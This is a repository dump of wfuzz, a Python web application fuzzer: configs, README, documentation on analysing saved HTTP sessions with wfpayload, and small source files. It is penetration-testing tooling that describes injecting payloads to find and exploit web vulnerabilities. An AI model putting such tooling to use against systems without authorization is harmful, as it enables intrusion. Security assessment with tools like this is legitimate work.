├── .flake8 ├── .github ├── dependabot.yml └── workflows │ └── docker-release.yml ├── .gitignore ├── .travis.yml ├── Dockerfile ├── ISSUE_TEMPLATE.md ├── LICENSE ├── MANIFEST.in ├── Makefile ├── README.md ├── docs ├── Makefile ├── _static │ ├── logo.png │ └── logo │ │ ├── wfuzz.svg │ │ └── wfuzz_letters.svg ├── _templates │ └── sidebarlogo.html ├── conf.py ├── dev │ └── plugins.rst ├── index.rst ├── library │ └── guide.rst ├── make.bat └── user │ ├── advanced.rst │ ├── basicusage.rst │ ├── breaking.rst │ ├── getting.rst │ ├── installation.rst │ └── wfpayload.rst ├── requirements.txt ├── setup.py ├── src ├── wfencode.py ├── wfpayload.py ├── wfuzz-cli.py ├── wfuzz │ ├── __init__.py │ ├── __main__.py │ ├── api.py │ ├── core.py │ ├── dictionaries.py │ ├── exception.py │ ├── externals │ │ ├── __init__.py │ │ ├── moduleman │ │ │ ├── __init__.py │ │ │ ├── loader.py │ │ │ ├── modulefilter.py │ │ │ ├── plugin.py │ │ │ └── registrant.py │ │ ├── reqresp │ │ │ ├── Request.py │ │ │ ├── Response.py │ │ │ ├── TextParser.py │ │ │ ├── Variables.py │ │ │ ├── __init__.py │ │ │ ├── cache.py │ │ │ └── exceptions.py │ │ └── settings │ │ │ ├── __init__.py │ │ │ └── settings.py │ ├── facade.py │ ├── factories │ │ ├── __init__.py │ │ ├── dictfactory.py │ │ ├── fuzzfactory.py │ │ ├── fuzzresfactory.py │ │ ├── payman.py │ │ ├── plugin_factory.py │ │ └── reqresp_factory.py │ ├── filters │ │ ├── __init__.py │ │ ├── ppfilter.py │ │ └── simplefilter.py │ ├── fuzzobjects.py │ ├── fuzzqueues.py │ ├── fuzzrequest.py │ ├── helpers │ │ ├── __init__.py │ │ ├── file_func.py │ │ ├── obj_dic.py │ │ ├── obj_dyn.py │ │ ├── obj_factory.py │ │ ├── str_func.py │ │ └── utils.py │ ├── mixins.py │ ├── myhttp.py │ ├── myqueues.py │ ├── options.py │ ├── plugin_api │ │ ├── __init__.py │ │ ├── base.py │ │ ├── mixins.py │ │ ├── payloadtools.py │ │ └── urlutils.py │ ├── plugins │ │ ├── __init__.py │ │ ├── encoders │ │ │ ├── __init__.py │ │ │ └── encoders.py │ │ ├── iterators │ │ │ ├── __init__.py │ │ │ └── 
iterations.py │ │ ├── payloads │ │ │ ├── __init__.py │ │ │ ├── autorize.py │ │ │ ├── bing.py │ │ │ ├── buffer_overflow.py │ │ │ ├── burpitem.py │ │ │ ├── burplog.py │ │ │ ├── burpstate.py │ │ │ ├── dirwalk.py │ │ │ ├── file.py │ │ │ ├── guitab.py │ │ │ ├── hexrand.py │ │ │ ├── hexrange.py │ │ │ ├── ipnet.py │ │ │ ├── iprange.py │ │ │ ├── list.py │ │ │ ├── names.py │ │ │ ├── permutation.py │ │ │ ├── range.py │ │ │ ├── shodanp.py │ │ │ ├── stdin.py │ │ │ └── wfuzzp.py │ │ ├── printers │ │ │ ├── __init__.py │ │ │ └── printers.py │ │ └── scripts │ │ │ ├── __init__.py │ │ │ ├── backups.py │ │ │ ├── cookies.py │ │ │ ├── cvs_extractor.py │ │ │ ├── errors.py │ │ │ ├── grep.py │ │ │ ├── headers.py │ │ │ ├── links.py │ │ │ ├── listing.py │ │ │ ├── npm_deps.py │ │ │ ├── robots.py │ │ │ ├── screenshot.py │ │ │ ├── sitemap.py │ │ │ ├── svn_extractor.py │ │ │ ├── title.py │ │ │ └── wcdb.py │ ├── ui │ │ ├── __init__.py │ │ ├── console │ │ │ ├── __init__.py │ │ │ ├── clparser.py │ │ │ ├── common.py │ │ │ ├── getch.py │ │ │ ├── mvc.py │ │ │ └── output.py │ │ └── gui │ │ │ ├── __init__.py │ │ │ ├── controller.py │ │ │ ├── guicontrols.py │ │ │ └── model.py │ └── wfuzz.py └── wxfuzz.py ├── tests ├── acceptance │ └── test_saved_filter.py ├── api │ ├── test_encoders.py │ ├── test_payload.py │ └── test_session.py ├── conftest.py ├── factories │ └── test_seedbasebuilder.py ├── filters │ ├── test_filter.py │ ├── test_filter_codes.py │ ├── test_filter_urlp.py │ ├── test_prefilter_mangle.py │ └── test_prefilter_mangle_codes.py ├── helpers │ ├── test_dotdict.py │ └── test_insensitive_dict.py ├── plugins │ ├── test_burplog.py │ ├── test_links.py │ └── test_summary.py ├── server_dir │ ├── Dockerfile │ ├── dir │ │ ├── a │ │ ├── b │ │ ├── c │ │ └── one │ ├── docker-compose.yml │ ├── iterators │ │ ├── aa │ │ ├── ac │ │ └── bb │ ├── plugins │ │ └── robots.txt │ ├── recursive_dir │ │ └── a │ │ │ └── b │ │ │ └── c │ │ │ └── placeholder.txt │ ├── simple_server.py │ └── static │ │ └── placeholder.txt 
├── test_acceptance.py ├── test_api.py ├── test_clparser.py ├── test_filterintro.py ├── test_moduleman.py ├── test_relativeurl.py ├── test_req_parse.py └── test_reqresp.py ├── tox.ini ├── wfencode ├── wfencode.bat ├── wfpayload ├── wfpayload.bat ├── wfuzz ├── wfuzz.bat ├── wfuzz_bash_completion ├── wordlist ├── Injections │ ├── All_attack.txt │ ├── SQL.txt │ ├── Traversal.txt │ ├── XML.txt │ ├── XSS.txt │ └── bad_chars.txt ├── general │ ├── admin-panels.txt │ ├── big.txt │ ├── catala.txt │ ├── common.txt │ ├── euskera.txt │ ├── extensions_common.txt │ ├── http_methods.txt │ ├── medium.txt │ ├── megabeast.txt │ ├── mutations_common.txt │ ├── spanish.txt │ └── test.txt ├── others │ ├── common_pass.txt │ └── names.txt ├── stress │ ├── alphanum_case.txt │ ├── alphanum_case_extra.txt │ ├── char.txt │ ├── doble_uri_hex.txt │ ├── test_ext.txt │ └── uri_hex.txt ├── vulns │ ├── apache.txt │ ├── cgis.txt │ ├── coldfusion.txt │ ├── dirTraversal-nix.txt │ ├── dirTraversal-win.txt │ ├── dirTraversal.txt │ ├── domino.txt │ ├── fatwire.txt │ ├── fatwire_pagenames.txt │ ├── frontpage.txt │ ├── iis.txt │ ├── iplanet.txt │ ├── jrun.txt │ ├── netware.txt │ ├── oracle9i.txt │ ├── sharepoint.txt │ ├── sql_inj.txt │ ├── sunas.txt │ ├── tests.txt │ ├── tomcat.txt │ ├── vignette.txt │ ├── weblogic.txt │ └── websphere.txt └── webservices │ ├── ws-dirs.txt │ └── ws-files.txt ├── wxfuzz └── wxfuzz.bat /.flake8: -------------------------------------------------------------------------------- 1 | [flake8] 2 | max-line-length = 80 3 | select = C,E,F,W,B,B950 4 | ignore = E203, E501, W503, E402, F401, W504 5 | -------------------------------------------------------------------------------- /.github/dependabot.yml: -------------------------------------------------------------------------------- 1 | version: 2 2 | updates: 3 | 4 | - package-ecosystem: "github-actions" 5 | directory: "/" 6 | schedule: 7 | interval: "daily" 8 | 9 | - package-ecosystem: "docker" 10 | directory: "/" 11 | schedule: 12 
| interval: "daily" 13 | 14 | - package-ecosystem: "pip" 15 | directory: "/" 16 | schedule: 17 | interval: "daily" 18 | -------------------------------------------------------------------------------- /.github/workflows/docker-release.yml: -------------------------------------------------------------------------------- 1 | name: docker-release 2 | 3 | on: 4 | release: 5 | types: [published] 6 | 7 | jobs: 8 | docker: 9 | name: Build and push Docker image 10 | runs-on: ubuntu-latest 11 | steps: 12 | - name: Checkout repo 13 | uses: actions/checkout@v2 14 | 15 | - name: Set up QEMU 16 | uses: docker/setup-qemu-action@v1 17 | 18 | - name: Set up Docker Buildx 19 | uses: docker/setup-buildx-action@v1 20 | 21 | - name: Login to ghcr.io 22 | uses: docker/login-action@v1.4.1 23 | with: 24 | registry: ghcr.io 25 | username: ${{ github.repository_owner }} 26 | password: ${{ secrets.CR_PAT }} 27 | 28 | - name: Build and push Docker images 29 | uses: docker/build-push-action@v2 30 | with: 31 | context: . 32 | file: Dockerfile 33 | push: true 34 | tags: | 35 | ghcr.io/${{ github.repository_owner }}/wfuzz:${{ github.event.release.tag_name }} 36 | ghcr.io/${{ github.repository_owner }}/wfuzz:latest 37 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | wfuzz.ini 2 | 3 | # Byte-compiled / optimized / DLL files 4 | __pycache__/ 5 | *.py[cod] 6 | 7 | # C extensions 8 | *.so 9 | 10 | # Distribution / packaging 11 | .Python 12 | env/ 13 | build/ 14 | develop-eggs/ 15 | dist/ 16 | downloads/ 17 | eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .cache 42 | nosetests.xml 43 | coverage.xml 44 | 45 | # Translations 46 | *.mo 47 | *.pot 48 | 49 | # Django stuff: 50 | *.log 51 | 52 | # Sphinx documentation 53 | docs/_build/ 54 | 55 | # PyBuilder 56 | target/ 57 | 58 | # vim 59 | *.swp 60 | *.swo 61 | 62 | wfuzz.ini 63 | 64 | # Jetbrains IDE 65 | .idea 66 | -------------------------------------------------------------------------------- /.travis.yml: -------------------------------------------------------------------------------- 1 | sudo: required 2 | language: python 3 | services: 4 | - docker 5 | python: 6 | - "3.4" 7 | - "3.5" 8 | - "3.6" 9 | - "3.7" 10 | - "3.8" 11 | before_install: 12 | - docker-compose -f tests/server_dir/docker-compose.yml up -d 13 | install: 14 | - make install-dev 15 | - python setup.py install 16 | 17 | script: 18 | - flake8 src tests 19 | - coverage run --append -m unittest discover -v -s tests/ 20 | - if [[ $TRAVIS_PYTHON_VERSION == '3.6' && $TRAVIS_BRANCH == 'master' ]]; then codecov; fi 21 | - if [[ $TRAVIS_PYTHON_VERSION != '3.4' && $TRAVIS_PYTHON_VERSION != '3.5' ]]; then black --check src tests; fi 22 | deploy: 23 | provider: pypi 24 | user: x4vi_mendez 25 | password: 26 | secure: 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 27 | distributions: sdist bdist_wheel 28 | on: 29 | branch: 30 | - master 31 | - /^v.*$/ 32 | tags: true 33 | python: 3.6 34 | addons: 35 | apt: 36 | packages: 37 | - libcurl4-openssl-dev 38 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-alpine3.12 as builder 2 | 3 | RUN apk add --no-cache build-base curl-dev 4 | 5 | COPY . 
wfuzz/ 6 | 7 | WORKDIR wfuzz/ 8 | 9 | RUN python setup.py install 10 | 11 | 12 | FROM python:3.8-alpine3.12 13 | 14 | RUN apk add --no-cache curl-dev 15 | 16 | COPY --from=builder /usr/local /usr/local 17 | 18 | CMD wfuzz 19 | -------------------------------------------------------------------------------- /ISSUE_TEMPLATE.md: -------------------------------------------------------------------------------- 1 | # Issue template 2 | 3 | ## Context 4 | 5 | **Please check:** 6 | 7 | - [ ] I've read the docs for [Wfuzz](http://wfuzz.readthedocs.io/) 8 | 9 | **Please describe your local environment:** 10 | 11 | Wfuzz version: Output of wfuzz --version 12 | 13 | Python version: Output of python --version 14 | 15 | OS: X 16 | 17 | ## Report 18 | 19 | **What is the current behavior?** 20 | 21 | X 22 | 23 | **What is the expected or desired behavior?** 24 | 25 | X 26 | 27 | **Please provide steps to reproduce, including exact wfuzz command executed and output:** 28 | 29 | X 30 | 31 | **Other relevant information:** 32 | 33 | X 34 | -------------------------------------------------------------------------------- /MANIFEST.in: -------------------------------------------------------------------------------- 1 | include README.md 2 | include LICENSE 3 | include docs/* 4 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | .PHONY: docs 2 | tox: 3 | pip install tox 4 | tox --recreate 5 | test: 6 | pytest -v -s tests/ 7 | flake8: 8 | black --check src tests 9 | flake8 src tests 10 | publish: 11 | pip install 'twine>=1.5.0' 12 | python setup.py sdist 13 | twine upload dist/* 14 | rm -fr build dist 15 | 16 | publish-dev: 17 | pip install 'twine>=1.5.0' 18 | python setup.py sdist 19 | twine upload --repository-url https://test.pypi.org/legacy/ dist/* 20 | rm -fr build dist 21 | docs: 22 | pip install -e ".[docs]" 23 | cd docs && make html 24 | 25 | coverage: 26 
| coverage report --skip-covered --include "*python3.8/site-packages/wfuzz*" -m 27 | 28 | install: install-dev 29 | pip install -r requirements.txt 30 | 31 | install-dev: 32 | pip install -e ".[dev]" 33 | 34 | freeze: 35 | pip-compile --output-file requirements.txt setup.py 36 | help: 37 | @echo "make help Show this help message" 38 | @echo "make test Run local tests with tox" 39 | @echo "make flake8 Run the code linter(s) and print any warnings" 40 | @echo "make publish Publish pip lib to pypi" 41 | @echo "make publish-dev Publish pip lib to pypi test" 42 | @echo "make docs Create html docs" 43 | @echo "make install Install requirements" 44 | @echo "make install-dev Install dev requirements" 45 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | [![Build Status](https://travis-ci.org/xmendez/wfuzz.svg?branch=master)](https://travis-ci.org/xmendez/wfuzz) 4 | 5 | 6 | 7 | 8 | 9 | 10 | # Wfuzz - The Web Fuzzer 11 | 12 | Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the FUZZ keyword by the value of a given payload. 13 | 14 | A payload in Wfuzz is a source of data. 15 | 16 | This simple concept allows any input to be injected in any field of an HTTP request, allowing to perform complex web security attacks in different web application components such as: parameters, authentication, forms, directories/files, headers, etc. 17 | 18 | Wfuzz is more than a web content scanner: 19 | 20 | * Wfuzz could help you to secure your web applications by finding and exploiting web application vulnerabilities. Wfuzz’s web application vulnerability scanner is supported by plugins. 21 | 22 | * Wfuzz is a completely modular framework and makes it easy for even the newest of Python developers to contribute. 
Building plugins is simple and takes little more than a few minutes. 23 | 24 | * Wfuzz exposes a simple language interface to the previous HTTP requests/responses performed using Wfuzz or other tools, such as Burp. This allows you to perform manual and semi-automatic tests with full context and understanding of your actions, without relying on a web application scanner underlying implementation. 25 | 26 | 27 | It was created to facilitate the task in web applications assessments, it's a tool by pentesters for pentesters ;) 28 | 29 | ## Installation 30 | 31 | To install WFuzz, simply use pip: 32 | 33 | ``` 34 | pip install wfuzz 35 | ``` 36 | 37 | To run Wfuzz from a docker image, run: 38 | 39 | ``` 40 | $ docker run -v $(pwd)/wordlist:/wordlist/ -it ghcr.io/xmendez/wfuzz wfuzz 41 | ``` 42 | 43 | ## Documentation 44 | 45 | Documentation is available at http://wfuzz.readthedocs.io 46 | 47 | ## Download 48 | 49 | Check github releases. Latest is available at https://github.com/xmendez/wfuzz/releases/latest 50 | -------------------------------------------------------------------------------- /docs/Makefile: -------------------------------------------------------------------------------- 1 | # Minimal makefile for Sphinx documentation 2 | # 3 | 4 | # You can set these variables from the command line. 5 | SPHINXOPTS = 6 | SPHINXBUILD = sphinx-build 7 | SPHINXPROJ = Wfuzz 8 | SOURCEDIR = . 9 | BUILDDIR = _build 10 | 11 | # Put it first so that "make" without argument is like "make help". 12 | help: 13 | @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) 14 | 15 | .PHONY: help Makefile 16 | 17 | # Catch-all target: route all unknown targets to Sphinx using the new 18 | # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 
19 | %: Makefile 20 | @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) -------------------------------------------------------------------------------- /docs/_static/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/_static/logo.png -------------------------------------------------------------------------------- /docs/_templates/sidebarlogo.html: -------------------------------------------------------------------------------- 1 | 6 |

7 | 8 |

9 | WFuzz is a web application security fuzzer tool and library for Python. 10 |

11 | 12 | 13 |

GitHub repository

14 | 15 |

16 | Be part of the Wfuzz community via GitHub tickets and pull requests.

17 | 18 | 20 |

21 | 22 |

Stay informed

23 | 24 |

25 | Don’t forget to follow me on GitHub and Twitter for news, releases and feedback. 26 |

27 | 28 |

30 | 31 |

32 | 33 | Follow @x4vi_mendez 34 |

35 | 36 | -------------------------------------------------------------------------------- /docs/dev/plugins.rst: -------------------------------------------------------------------------------- 1 | Plugin template 2 | =============== 3 | 4 | Printer template 5 | =============== 6 | 7 | Encoder template 8 | =============== 9 | -------------------------------------------------------------------------------- /docs/make.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | pushd %~dp0 4 | 5 | REM Command file for Sphinx documentation 6 | 7 | if "%SPHINXBUILD%" == "" ( 8 | set SPHINXBUILD=sphinx-build 9 | ) 10 | set SOURCEDIR=. 11 | set BUILDDIR=_build 12 | set SPHINXPROJ=Wfuzz 13 | 14 | if "%1" == "" goto help 15 | 16 | %SPHINXBUILD% >NUL 2>NUL 17 | if errorlevel 9009 ( 18 | echo. 19 | echo.The 'sphinx-build' command was not found. Make sure you have Sphinx 20 | echo.installed, then set the SPHINXBUILD environment variable to point 21 | echo.to the full path of the 'sphinx-build' executable. Alternatively you 22 | echo.may add the Sphinx directory to PATH. 23 | echo. 24 | echo.If you don't have Sphinx installed, grab it from 25 | echo.http://sphinx-doc.org/ 26 | exit /b 1 27 | ) 28 | 29 | %SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 30 | goto end 31 | 32 | :help 33 | %SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% 34 | 35 | :end 36 | popd 37 | -------------------------------------------------------------------------------- /docs/user/breaking.rst: -------------------------------------------------------------------------------- 1 | Breaking changes 2 | ============= 3 | 4 | Following https://semver.org/ versioning since Wfuzz 3.0.0. 5 | 6 | * Wfuzz 3.0.0: 7 | * In wfuzz library prefilter is a list of filters not a string. 8 | * When using --recipe, stored options that are a list are appended. Previously, the last one took precedence. 
9 | -------------------------------------------------------------------------------- /docs/user/wfpayload.rst: -------------------------------------------------------------------------------- 1 | wfpayload 2 | ========= 3 | 4 | wfpayload uses the same engine as wfuzz but, instead of performing HTTP requests, it uses wfuzz's payload plugins to generate new content or analyse saved sessions. 5 | 6 | Generating new dictionaries 7 | ------------------- 8 | 9 | You can use wfpayload to create new dictionaries:: 10 | 11 | $ wfpayload -z range --zD 0-10 12 | 0 13 | 1 14 | 2 15 | 3 16 | 4 17 | 5 18 | 6 19 | 7 20 | 8 21 | 9 22 | 10 23 | 24 | The same syntax as wfuzz can be used, for example:: 25 | 26 | $ wfpayload -z range --zD 0-10 --filter "FUZZ<3" 27 | 0 28 | 1 29 | 2 30 | 31 | 32 | Analysing saved sessions 33 | ------------------ 34 | 35 | Previously performed HTTP requests/responses contain a treasure trove of data. You can use wfpayload to filter and analyse previously saved sessions. Wfpayload can also read sessions from external tools, such as Burp. 36 | 37 | This allows you to look for new vulnerabilities or understand the underlying target without performing new HTTP requests. 38 | 39 | For example, the following will return a unique list of HTTP requests including the authtoken parameter as a GET parameter:: 40 | 41 | $ wfpayload -z burplog,a_burp_log.log --slice "params.get~'authtoken'" 42 | 43 | Authtoken is the parameter used by BEA WebLogic Commerce Servers (TM) as a CSRF token, and therefore the above will find all the requests exposing the CSRF token in the URL. A token carried in the URL can leak through server and proxy logs, browser history and the Referer header, which is why such requests are worth reviewing. 
44 | 45 | You can also look for specific parameters or headers, for example, the following will look for HTTP responses accepting any CORS origin:: 46 | 47 | $ wfpayload -z burplog --zD burp_log_05032020.log --prefilter "r.headers.response.Access-Control-Allow-Origin='*'" 48 | 49 | It is worth noting that, if the header is not present in the response, it will return an empty value instead of raising an error. 50 | 51 | You can also select the fields to show with --efield and --field, for example:: 52 | 53 | $ wfpayload -z wfuzzp --zD /tmp/session --field r.params.get 54 | artist=5 55 | ... 56 | 57 | Or:: 58 | 59 | $ wfpayload -z wfuzzp --zD /tmp/session --efield r.params.get 60 | 000000006: 200 99 L 272 W 3868 Ch "5 | artist=5" 61 | ... 62 | 63 | Running plugins against saved sessions 64 | ------------------- 65 | 66 | Plugins can be run against a saved session. For example:: 67 | 68 | $ ./wfpayload -z burplog --zD ./burp_log_05032020.log --script=headers --filter "plugins~'akamai'" 69 | ... 70 | 000000124: 302 0 L 0 W 0 Ch "https://trial-eum-clientnsv4-s.akamaihd.net/eum/getdns.txt?c=pjq71x1r7" 71 | |_ New Server header - AkamaiGHost 72 | 000000913: 200 10 L 6571 W 289832 Ch "https://assets.adobedtm.com/2eed2bf00c8bca0c98d97ffee50a306922bc8c98/satelliteLib-27b81756e778cc85cc1a2f067764cd3abf072aa9.js" 73 | |_ New Server header - AkamaiNetStorage 74 | ... 75 | 76 | Re-writing saved sessions 77 | ------------------- 78 | 79 | The content of a saved session can be re-written. 
For example, let's say there is a session with a bunch of 404/400 results that you want to remove:: 80 | 81 | $ wfpayload -z burplog --zD ./burp_log_05032020.log --hc 404 --oF /tmp/no404 82 | 83 | and then:: 84 | 85 | $ wfpayload -z wfuzzp --zD /tmp/no404 86 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | # 2 | # This file is autogenerated by pip-compile 3 | # To update, run: 4 | # 5 | # pip-compile --output-file=requirements.txt setup.py 6 | # 7 | attrs==20.1.0 # via pytest 8 | chardet==3.0.4 # via wfuzz (setup.py) 9 | iniconfig==1.0.1 # via pytest 10 | more-itertools==8.5.0 # via pytest 11 | packaging==20.4 # via pytest 12 | pluggy==0.13.1 # via pytest 13 | py==1.9.0 # via pytest 14 | pycurl==7.43.0.6 # via wfuzz (setup.py) 15 | pyparsing==2.4.7 # via packaging 16 | pytest==6.0.1 # via wfuzz (setup.py) 17 | six==1.15.0 # via packaging, wfuzz (setup.py) 18 | toml==0.10.1 # via pytest 19 | -------------------------------------------------------------------------------- /setup.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import re 4 | from setuptools import setup, find_packages 5 | 6 | with open("README.md", "rb") as f: 7 | long_descr = f.read().decode("utf-8") 8 | 9 | 10 | version = re.search( 11 | r'^__version__\s*=\s*"(.*)"', 12 | open('src/wfuzz/__init__.py').read(), 13 | re.M 14 | ).group(1) 15 | 16 | docs_requires = [ 17 | "Sphinx", 18 | ] 19 | 20 | dev_requires = [ 21 | 'mock', 22 | 'coverage', 23 | 'codecov', 24 | 'netaddr', # tests/api/test_payload.py uses ipranges payload 25 | 'pip-tools', 26 | 'flake8==3.8.3', 27 | 'black==19.10b0;python_version>"3.5"', 28 | 'pytest', 29 | ] 30 | 31 | install_requires = [ 32 | 'pycurl', 33 | 'pyparsing<2.4.2;python_version<="3.4"', 34 | 'pyparsing>=2.4*;python_version>="3.5"', 35 | 'six', 36 | 
'configparser;python_version<"3.5"', 37 | 'chardet', 38 | ] 39 | 40 | 41 | if sys.platform.startswith("win"): 42 | install_requires += ["colorama>=0.4.0"] 43 | 44 | 45 | try: 46 | os.symlink('../../docs/user/advanced.rst', 'src/wfuzz/advanced.rst') 47 | setup( 48 | name="wfuzz", 49 | packages=find_packages(where='src'), 50 | package_dir={'wfuzz': 'src/wfuzz'}, 51 | include_package_data=True, 52 | package_data={'wfuzz': ['*.rst']}, 53 | entry_points={ 54 | 'console_scripts': [ 55 | 'wfuzz = wfuzz.wfuzz:main', 56 | 'wfpayload = wfuzz.wfuzz:main_filter', 57 | 'wfencode = wfuzz.wfuzz:main_encoder', 58 | ], 59 | 'gui_scripts': [ 60 | 'wxfuzz = wfuzz.wfuzz:main_gui', 61 | ] 62 | }, 63 | version=version, 64 | description="Wfuzz - The web fuzzer", 65 | long_description=long_descr, 66 | long_description_content_type='text/markdown', 67 | author="Xavi Mendez (@x4vi_mendez)", 68 | author_email="xmendez@edge-security.com", 69 | url="http://wfuzz.org", 70 | license="GPLv2", 71 | install_requires=install_requires, 72 | extras_require={ 73 | 'dev': dev_requires, 74 | 'docs': docs_requires, 75 | }, 76 | python_requires=">=2.6", 77 | classifiers=( 78 | 'Development Status :: 4 - Beta', 79 | 'Natural Language :: English', 80 | 'License :: OSI Approved :: GNU General Public License v2 (GPLv2)', 81 | 'Programming Language :: Python', 82 | 'Programming Language :: Python :: 3', 83 | 'Programming Language :: Python :: 3.4', 84 | 'Programming Language :: Python :: 3.5', 85 | 'Programming Language :: Python :: 3.6', 86 | 'Programming Language :: Python :: 3.7', 87 | 'Programming Language :: Python :: 3.8', 88 | ), 89 | ) 90 | finally: 91 | os.unlink('src/wfuzz/advanced.rst') 92 | -------------------------------------------------------------------------------- /src/wfencode.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from wfuzz.wfuzz import main_encoder 3 | 4 | if __name__ == "__main__": 5 | main_encoder() 6 | 
-------------------------------------------------------------------------------- /src/wfpayload.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from wfuzz.wfuzz import main_filter 3 | 4 | if __name__ == "__main__": 5 | main_filter() 6 | -------------------------------------------------------------------------------- /src/wfuzz-cli.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | from wfuzz.wfuzz import main 4 | 5 | if __name__ == "__main__": 6 | main() 7 | -------------------------------------------------------------------------------- /src/wfuzz/__init__.py: -------------------------------------------------------------------------------- 1 | __title__ = "wfuzz" 2 | __version__ = "3.1.0" 3 | __build__ = 0x023000 4 | __author__ = "Xavier Mendez" 5 | __license__ = "GPL 2.0" 6 | __copyright__ = "Copyright 2011-2020 Xavier Mendez" 7 | 8 | import logging 9 | import sys 10 | 11 | import warnings 12 | 13 | 14 | # define a logging Handler 15 | console = logging.StreamHandler() 16 | console.setLevel(logging.WARNING) 17 | formatter = logging.Formatter("%(name)-12s: %(levelname)-8s %(message)s") 18 | console.setFormatter(formatter) 19 | logging.getLogger("").addHandler(console) 20 | 21 | 22 | # define warnings format 23 | def warning_on_one_line(message, category, filename, lineno, file=None, line=None): 24 | return " %s:%s: %s:%s\n" % (filename, lineno, category.__name__, message) 25 | 26 | 27 | warnings.formatwarning = warning_on_one_line 28 | 29 | 30 | try: 31 | import pycurl 32 | 33 | if "openssl".lower() not in pycurl.version.lower(): 34 | warnings.warn( 35 | "Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information." 36 | ) 37 | 38 | if not hasattr(pycurl, "CONNECT_TO"): 39 | warnings.warn( 40 | "Pycurl and/or libcurl version is old. 
CONNECT_TO option is missing. Wfuzz --ip option will not be available." 41 | ) 42 | 43 | if not hasattr(pycurl, "PATH_AS_IS"): 44 | warnings.warn( 45 | "Pycurl and/or libcurl version is old. PATH_AS_IS option is missing. Wfuzz might not correctly fuzz URLS with '..'." 46 | ) 47 | 48 | except ImportError: 49 | warnings.warn( 50 | "fuzz needs pycurl to run. Pycurl could be installed using the following command: $ pip install pycurl" 51 | ) 52 | 53 | sys.exit(1) 54 | 55 | from .options import FuzzSession 56 | from .api import fuzz, get_payload, get_payloads, encode, decode, payload, get_session 57 | -------------------------------------------------------------------------------- /src/wfuzz/__main__.py: -------------------------------------------------------------------------------- 1 | from .wfuzz import main 2 | 3 | main() 4 | -------------------------------------------------------------------------------- /src/wfuzz/api.py: -------------------------------------------------------------------------------- 1 | from .options import FuzzSession 2 | from .facade import Facade 3 | from .ui.console.clparser import CLParser 4 | 5 | """ 6 | Wfuzz API 7 | """ 8 | 9 | 10 | def fuzz(**kwargs): 11 | return FuzzSession(**kwargs).fuzz() 12 | 13 | 14 | def get_payloads(iterator): 15 | fs = FuzzSession() 16 | 17 | return fs.get_payloads(iterator) 18 | 19 | 20 | def get_payload(iterator): 21 | fs = FuzzSession() 22 | return fs.get_payload(iterator) 23 | 24 | 25 | def encode(name, value): 26 | return Facade().encoders.get_plugin(name)().encode(value) 27 | 28 | 29 | def decode(name, value): 30 | return Facade().encoders.get_plugin(name)().decode(value) 31 | 32 | 33 | def payload(**kwargs): 34 | return FuzzSession(**kwargs).payload() 35 | 36 | 37 | def get_session(cline): 38 | cl = ["wfuzz"] + cline.split(" ") 39 | return FuzzSession(**CLParser(cl).parse_cl()) 40 | -------------------------------------------------------------------------------- /src/wfuzz/exception.py: 
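--------------------------------------------------------------------------------
class FuzzException(Exception):
    """Base class of every exception defined in this module."""


class FuzzExceptBadOptions(FuzzException):
    pass


class FuzzExceptNoPluginError(FuzzException):
    """Raised by wfuzz.facade for an unknown plugin or plugin category."""


class FuzzExceptPluginLoadError(FuzzException):
    """Raised by wfuzz.facade.Facade._load when a plugin category cannot be loaded."""


class FuzzExceptIncorrectFilter(FuzzException):
    pass


class FuzzExceptBadAPI(FuzzException):
    """Raised by plugin_api.urlutils.check_content_type for an unknown content type."""


class FuzzExceptInternalError(FuzzException):
    pass


class FuzzExceptBadFile(FuzzException):
    """Raised by payload plugins (e.g. autorize) when an input file cannot be read."""


class FuzzExceptBadInstall(FuzzException):
    """Raised when an optional dependency (e.g. beautifulsoup4) is not installed."""


class FuzzExceptBadRecipe(FuzzException):
    pass


class FuzzExceptMissingAPIKey(FuzzException):
    pass


class FuzzExceptPluginBadParams(FuzzException):
    pass


class FuzzExceptResourceParseError(FuzzException):
    pass


class FuzzExceptPluginError(FuzzException):
    pass


class FuzzExceptNetError(FuzzException):
    pass

--------------------------------------------------------------------------------
/src/wfuzz/externals/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/externals/moduleman/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/externals/moduleman/__init__.py
--------------------------------------------------------------------------------
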